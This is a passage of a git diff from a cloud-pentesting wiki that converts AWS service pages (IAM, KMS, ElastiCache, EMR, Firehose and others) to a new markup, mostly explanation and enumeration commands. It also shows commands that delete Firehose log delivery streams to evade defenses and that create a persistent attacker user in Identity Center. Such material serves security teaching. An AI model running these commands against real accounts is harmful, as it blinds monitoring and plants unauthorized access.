+ - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier).
+- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role.
+ - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) By default **metadata version 1 is disabled**: -
+
### Exposure @@ -74,15 +61,13 @@ Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticb The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`** -{% hint style="warning" %} -If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it - -if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. -{% endhint %} +> [!WARNING] +> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it +> +> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. ### Enumeration -{% code overflow="wrap" %} ```bash # Find S3 bucket ACCOUNT_NUMBER= 
@@ -100,43 +85,29 @@ aws elasticbeanstalk describe-instances-health --environment-name # G # Get events aws elasticbeanstalk describe-events ``` -{% endcode %} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md" %} -[aws-elastic-beanstalk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-elastic-beanstalk-persistence.md" %} -[aws-elastic-beanstalk-persistence.md](../aws-persistence/aws-elastic-beanstalk-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-elastic-beanstalk-persistence.md +{{#endref}} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md" %} -[aws-elastic-beanstalk-privesc.md](../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md" %} -[aws-elastic-beanstalk-post-exploitation.md](../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
new file mode 100644
index 000000000..69561eb89
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md
@@ -0,0 +1,45 @@
+# AWS - ElastiCache
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## ElastiCache
+
+AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**.
+
+### Enumeration
+
+```bash
+# ElastiCache clusters
+## Check the SecurityGroups to later check who can access
+## In Redis clusters: Check AuthTokenEnabled to see if you need password
+## In memcache clusters: You can find the URL to connect
+aws elasticache describe-cache-clusters
+
+# List all ElastiCache replication groups
+## Find here the accesible URLs for Redis clusters
+aws elasticache describe-replication-groups
+
+#List all ElastiCache parameter groups
+aws elasticache describe-cache-parameter-groups
+
+#List all ElastiCache security groups
+## If this gives an error it's because it's using SGs from EC2
+aws elasticache describe-cache-security-groups
+
+#List all ElastiCache subnet groups
+aws elasticache describe-cache-subnet-groups
+
+# Get snapshots
+aws elasticache describe-snapshots
+
+# Get users and groups
+aws elasticache describe-user-groups
+aws elasticache describe-users
+
+# List ElastiCache events
+aws elasticache describe-events
+```
+
+### Privesc (TODO)
+
+{{#include ../../../banners/hacktricks-training.md}}
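Review bot: The comment `## In Redis clusters: Check AuthTokenEnabled to see if you need password` tells only part of the connection story: the same `describe-cache-clusters` / `describe-replication-groups` output also exposes `TransitEncryptionEnabled`, which decides whether the client must speak TLS (`redis-cli --tls`), and on Redis 6+ access may be gated by RBAC users and user groups instead of a single AUTH token, which is what the later `describe-users` / `describe-user-groups` calls surface (`UserGroupIds` on the replication group ties the two together). I would extend the comment to `## Redis: check AuthTokenEnabled (AUTH token), TransitEncryptionEnabled (needs --tls) and UserGroupIds (RBAC users)`. Also `accesible` in `## Find here the accesible URLs for Redis clusters` is misspelled (`accessible`).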
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
new file mode 100644
index 000000000..12373e9bd
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md
@@ -0,0 +1,60 @@ +# AWS - EMR Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## EMR + +AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. + +Key characteristics include: + +- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: + - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. + - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: + - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. + - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. +- **Encryption in Transit**: Focuses on securing data during transfer. Options include: + - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: + - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. + - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. + +Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: + +- **Hadoop**: + - Might reduce encrypted shuffle using TLS. + - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. 
+- **Presto** (EMR version 5.6.0+): + - Internal communication between Presto nodes is secured using SSL and TLS. +- **Tez Shuffle Handler**: + - Utilizes TLS for encryption. +- **Spark**: + - Employs TLS for the Akka protocol. + - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. + - External shuffle service is secured with the Simple Authentication Security Layer. + +These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. + +#### Enumeration + +```bash +aws emr list-clusters +aws emr describe-cluster --cluster-id +aws emr list-instances --cluster-id +aws emr list-instance-fleets --cluster-id +aws emr list-steps --cluster-id +aws emr list-notebook-executions +aws emr list-security-configurations +aws emr list-studios #Get studio URLs +``` + +#### Privesc + +{{#ref}} +../aws-privilege-escalation/aws-emr-privesc.md +{{#endref}} + +## References + +- [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md similarity index 66% rename from pentesting-cloud/aws-security/aws-services/aws-iam-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md index 40a1e3b6d..618b98e7a 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md 
@@ -1,43 +1,30 @@ # AWS - IAM, Identity Center & SSO Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## IAM You can find a **description of IAM** in: -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} +{{#ref}} +../aws-basic-information/ +{{#endref}} ### Enumeration Main permissions needed: -* `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` -* `iam:ListRoles` -* `iam:ListUsers` -* `iam:ListGroups` -* `iam:ListGroupsForUser` -* `iam:ListAttachedUserPolicies` -* `iam:ListAttachedRolePolicies` -* `iam:ListAttachedGroupPolicies` -* `iam:ListUserPolicies` and `iam:GetUserPolicy` -* `iam:ListGroupPolicies` and `iam:GetGroupPolicy` -* `iam:ListRolePolicies` and `iam:GetRolePolicy` +- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` +- `iam:ListRoles` +- `iam:ListUsers` +- `iam:ListGroups` +- `iam:ListGroupsForUser` +- `iam:ListAttachedUserPolicies` +- `iam:ListAttachedRolePolicies` +- `iam:ListAttachedGroupPolicies` +- `iam:ListUserPolicies` and `iam:GetUserPolicy` +- `iam:ListGroupPolicies` and `iam:GetGroupPolicy` +- `iam:ListRolePolicies` and `iam:GetRolePolicy` ```bash # All IAMs @@ -111,12 +98,10 @@ If you are interested in your own permissions but you don't have access to query The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**. -{% code overflow="wrap" %} ```bash # Bruteforce permissions bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt ``` -{% endcode %} #### bf-aws-perms-simulate 
@@ -131,33 +116,27 @@ python3 aws_permissions_checker.py --profile [--arn ] If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**. -{% code overflow="wrap" %} ```bash # Run example with my profile python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt ``` -{% endcode %} -{% hint style="warning" %} -It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. -{% endhint %} +> [!WARNING] +> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. #### Cloudtrail2IAM [**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**. -{% code overflow="wrap" %} ```bash git clone https://github.com/carlospolop/Cloudtrail2IAM cd Cloudtrail2IAM pip install -r requirements.txt python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS] ``` -{% endcode %} -{% hint style="warning" %} -If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. 
-{% endhint %} +> [!WARNING] +> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. #### enumerate-iam @@ -165,11 +144,9 @@ To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://git (In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that). -{% hint style="warning" %} -In my experience this tool is like the previous one but working worse and checking less permissions -{% endhint %} +> [!WARNING] +> In my experience this tool is like the previous one but working worse and checking less permissions -{% code overflow="wrap" %} ```bash # Install tool git clone git@github.com:andresriancho/enumerate-iam.git @@ -186,7 +163,6 @@ cd .. # Enumerate permissions python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION] ``` -{% endcode %} #### weirdAAL @@ -218,9 +194,9 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions #### Hardening Tools to BF permissions -{% tabs %} -{% tab title="CloudSploit" %} -{% code overflow="wrap" %} +{{#tabs }} +{{#tab name="CloudSploit" }} + ```bash # Export env variables ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json 
@@ -231,10 +207,11 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json # Get services by regions jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json ``` -{% endcode %} -{% endtab %} -{% tab title="SteamPipe" %} +{{#endtab }} + +{{#tab name="SteamPipe" }} + ```bash # https://github.com/turbot/steampipe-mod-aws-insights steampipe check all --export=json @@ -243,8 +220,9 @@ steampipe check all --export=json # In this case you cannot output to JSON, so heck it in the dashboard steampipe dashboard ``` -{% endtab %} -{% endtabs %} + +{{#endtab }} +{{#endtabs }} #### \ 
@@ -252,37 +230,37 @@ Neither of the previous tools is capable of checking close to all permissions, s ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md" %} -[aws-iam-and-sts-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +{{#endref}} ### Privilege Escalation In the following page you can check how to **abuse IAM permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-iam-privesc.md" %} -[aws-iam-privesc.md](../aws-privilege-escalation/aws-iam-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-iam-privesc.md +{{#endref}} ### IAM Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-iam-post-exploitation.md" %} -[aws-iam-post-exploitation.md](../aws-post-exploitation/aws-iam-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-iam-post-exploitation.md +{{#endref}} ### IAM Persistence -{% content-ref url="../aws-persistence/aws-iam-persistence.md" %} -[aws-iam-persistence.md](../aws-persistence/aws-iam-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-iam-persistence.md +{{#endref}} ## IAM Identity Center You can find a **description of IAM Identity Center** in: -{% content-ref url="../aws-basic-information/" %} -[aws-basic-information](../aws-basic-information/) -{% endcontent-ref %} +{{#ref}} +../aws-basic-information/ +{{#endref}} ### Connect via SSO with CLI 
@@ -301,15 +279,14 @@ sso_region = us-east-1 The main elements of the Identity Center are: -* Users and groups -* Permission Sets: Have policies attached -* AWS Accounts +- Users and groups +- Permission Sets: Have policies attached +- AWS Accounts Then, relationships are created so users/groups have Permission Sets over AWS Account. -{% hint style="info" %} -Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). -{% endhint %} +> [!NOTE] +> Note that there are 3 ways to attach policies to a Permission Set. Attaching AWS managed policies, Customer managed policies (these policies needs to be created in all the accounts the Permissions Set is affecting), and inline policies (defined in there). ```bash # Check if IAM Identity Center is used 
@@ -390,51 +367,36 @@ external_id = 123456 ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md" %} -[aws-identity-center-and-sso-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md +{{#endref}} ### Privilege Escalation -{% content-ref url="../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md" %} -[aws-sso-and-identitystore-privesc.md](../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-sso-and-identitystore-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md" %} -[aws-sso-and-identitystore-post-exploitation.md](../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-sso-and-identitystore-post-exploitation.md +{{#endref}} ### Persistence #### Create a user an assign permissions to it -{% code overflow="wrap" %} ```bash # Create user identitystore:CreateUser aws identitystore create-user --identity-store-id --user-name privesc --display-name privesc --emails Value=sdkabflvwsljyclpma@tmmbt.net,Type=Work,Primary=True --name Formatted=privesc,FamilyName=privesc,GivenName=privesc ## After creating it try to login in the console using the selected username, you will receive an email with the code and then you will be able to select a password ``` -{% endcode %} -* Create a group and assign it permissions and set on it a controlled user -* Give extra permissions to a controlled user or group -* By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. 
+- Create a group and assign it permissions and set on it a controlled user +- Give extra permissions to a controlled user or group +- By default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center. - However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). + However, it's possible via Delegate Administrator to allow users from a different account to manage it. They won't have exactly the same permission, but they will be able to perform [**management activities**](https://docs.aws.amazon.com/singlesignon/latest/userguide/delegated-admin.html). -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
new file mode 100644
index 000000000..207c1d53f
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.md
@@ -0,0 +1,51 @@ +# AWS - Kinesis Data Firehose Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Kinesis Data Firehose + +Amazon Kinesis Data Firehose is a **fully managed service** that facilitates the delivery of **real-time streaming data**. It supports a variety of destinations, including Amazon Simple Storage Service (Amazon S3), Amazon Redshift, Amazon OpenSearch Service, Splunk, and custom HTTP endpoints. + +The service alleviates the need for writing applications or managing resources by allowing data producers to be configured to forward data directly to Kinesis Data Firehose. This service is responsible for the **automatic delivery of data to the specified destination**. Additionally, Kinesis Data Firehose provides the option to **transform the data prior to its delivery**, enhancing its flexibility and applicability to various use cases. + +### Enumeration + +```bash +# Get delivery streams +aws firehose list-delivery-streams + +# Get stream info +aws firehose describe-delivery-stream --delivery-stream-name +## Get roles +aws firehose describe-delivery-stream --delivery-stream-name | grep -i RoleARN +``` + +## Post-exploitation / Defense Bypass + +In case firehose is used to send logs or defense insights, using these functionalities an attacker could prevent it from working properly. 
+ +### firehose:DeleteDeliveryStream + +``` +aws firehose delete-delivery-stream --delivery-stream-name --allow-force-delete +``` + +### firehose:UpdateDestination + +``` +aws firehose update-destination --delivery-stream-name --current-delivery-stream-version-id --destination-id +``` + +### firehose:PutRecord | firehose:PutRecordBatch + +``` +aws firehose put-record --delivery-stream-name my-stream --record '{"Data":"SGVsbG8gd29ybGQ="}' + +aws firehose put-record-batch --delivery-stream-name my-stream --records file://records.json +``` + +## References + +- [https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html](https://docs.amazonaws.cn/en_us/firehose/latest/dev/what-is-this-service.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md new file mode 100644 index 000000000..b64eee2d5 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-kms-enum.md 
@@ -0,0 +1,158 @@ +# AWS - KMS Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## KMS - Key Management Service + +AWS Key Management Service (AWS KMS) is presented as a managed service, simplifying the process for users to **create and manage customer master keys** (CMKs). These CMKs are integral in the encryption of user data. A notable feature of AWS KMS is that CMKs are predominantly **secured by hardware security modules** (HSMs), enhancing the protection of the encryption keys. + +KMS uses **symmetric cryptography**. This is used to **encrypt information as rest** (for example, inside a S3). If you need to **encrypt information in transit** you need to use something like **TLS**. + +KMS is a **region specific service**. + +**Administrators at Amazon do not have access to your keys**. They cannot recover your keys and they do not help you with encryption of your keys. AWS simply administers the operating system and the underlying application it's up to us to administer our encryption keys and administer how those keys are used. + +**Customer Master Keys** (CMK): Can encrypt data up to 4KB in size. They are typically used to create, encrypt, and decrypt the DEKs (Data Encryption Keys). Then the DEKs are used to encrypt the data. + +A customer master key (CMK) is a logical representation of a master key in AWS KMS. In addition to the master key's identifiers and other metadata, including its creation date, description, and key state, a **CMK contains the key material which used to encrypt and decrypt data**. When you create a CMK, by default, AWS KMS generates the key material for that CMK. However, you can choose to create a CMK without key material and then import your own key material into that CMK. + +There are 2 types of master keys: + +- **AWS managed CMKs: Used by other services to encrypt data**. It's used by the service that created it in a region. They are created the first time you implement the encryption in that service. 
Rotates every 3 years and it's not possible to change it. +- **Customer manager CMKs**: Flexibility, rotation, configurable access and key policy. Enable and disable keys. + +**Envelope Encryption** in the context of Key Management Service (KMS): Two-tier hierarchy system to **encrypt data with data key and then encrypt data key with master key**. + +### Key Policies + +These defines **who can use and access a key in KMS**. + +By **default:** + +- It gives the **IAM of the** **AWS account that owns the KMS key access** to manage the access to the KMS key via IAM. + + Unlike other AWS resource policies, a AWS **KMS key policy does not automatically give permission any of the principals of the account**. To give permission to account administrators, the **key policy must include an explicit statement** that provides this permission, like this one. + + - Without allowing the account(`"AWS": "arn:aws:iam::111122223333:root"`) IAM permissions won't work. + +- It **allows the account to use IAM policies** to allow access to the KMS key, in addition to the key policy. + + **Without this permission, IAM policies that allow access to the key are ineffective**, although IAM policies that deny access to the key are still effective. + +- It **reduces the risk of the key becoming unmanageable** by giving access control permission to the account administrators, including the account root user, which cannot be deleted. + +**Default policy** example: + +```json +{ + "Sid": "Enable IAM policies", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::111122223333:root" + }, + "Action": "kms:*", + "Resource": "*" +} +``` + +> [!WARNING] +> If the **account is allowed** (`"arn:aws:iam::111122223333:root"`) a **principal** from the account **will still need IAM permissions** to use the KMS key. However, if the **ARN** of a role for example is **specifically allowed** in the **Key Policy**, that role **doesn't need IAM permissions**. + +
+ +Policy Details + +Properties of a policy: + +- JSON based document +- Resource --> Affected resources (can be "\*") +- Action --> kms:Encrypt, kms:Decrypt, kms:CreateGrant ... (permissions) +- Effect --> Allow/Deny +- Principal --> arn affected +- Conditions (optional) --> Condition to give the permissions + +Grants: + +- Allow to delegate your permissions to another AWS principal within your AWS account. You need to create them using the AWS KMS APIs. It can be indicated the CMK identifier, the grantee principal and the required level of opoeration (Decrypt, Encrypt, GenerateDataKey...) +- After the grant is created a GrantToken and a GratID are issued + +**Access**: + +- Via **key policy** -- If this exist, this takes **precedent** over the IAM policy +- Via **IAM policy** +- Via **grants** + +
+ +### Key Administrators + +Key administrator by default: + +- Have access to manage KMS but not to encrypt or decrypt data +- Only IAM users and roles can be added to Key Administrators list (not groups) +- If external CMK is used, Key Administrators have the permission to import key material + +### Rotation of CMKs + +- The longer the same key is left in place, the more data is encrypted with that key, and if that key is breached, then the wider the blast area of data is at risk. In addition to this, the longer the key is active, the probability of it being breached increases. +- **KMS rotate customer keys every 365 days** (or you can perform the process manually whenever you want) and **keys managed by AWS every 3 years** and this time it cannot be changed. +- **Older keys are retained** to decrypt data that was encrypted prior to the rotation +- In a break, rotating the key won't remove the threat as it will be possible to decrypt all the data encrypted with the compromised key. However, the **new data will be encrypted with the new key**. +- If **CMK** is in state of **disabled** or **pending** **deletion**, KMS will **not perform a key rotation** until the CMK is re-enabled or deletion is cancelled. + +#### Manual rotation + +- A **new CMK needs to be created**, then, a new CMK-ID is created, so you will need to **update** any **application** to **reference** the new CMK-ID. +- To do this process easier you can **use aliases to refer to a key-id** and then just update the key the alias is referring to. +- You need to **keep old keys to decrypt old files** encrypted with it. + +You can import keys from your on-premises key infrastructure . + +### Other relevant KMS information + +KMS is priced per number of encryption/decryption requests received from all services per month. + +KMS has full audit and compliance **integration with CloudTrail**; this is where you can audit all changes performed on KMS. 
+ +With KMS policy you can do the following: + +- Limit who can create data keys and which services have access to use these keys +- Limit systems access to encrypt only, decrypt only or both +- Define to enable systems to access keys across regions (although it is not recommended as a failure in the region hosting KMS will affect availability of systems in other regions). + +You cannot synchronize or move/copy keys across regions; you can only define rules to allow access across region. + +### Enumeration + +```bash +aws kms list-keys +aws kms list-key-policies --key-id +aws kms list-grants --key-id +aws kms describe-key --key-id +aws kms get-key-policy --key-id --policy-name # Default policy name is "default" +aws kms describe-custom-key-stores +``` + +### Privesc + +{{#ref}} +../aws-privilege-escalation/aws-kms-privesc.md +{{#endref}} + +### Post Exploitation + +{{#ref}} +../aws-post-exploitation/aws-kms-post-exploitation.md +{{#endref}} + +### Persistence + +{{#ref}} +../aws-persistence/aws-kms-persistence.md +{{#endref}} + +## References + +- [https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html](https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-default.html) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md similarity index 69% rename from pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md index 34a5e0cc7..8888e1a5d 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-lambda-enum.md 
@@ -1,19 +1,6 @@ # AWS - Lambda Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
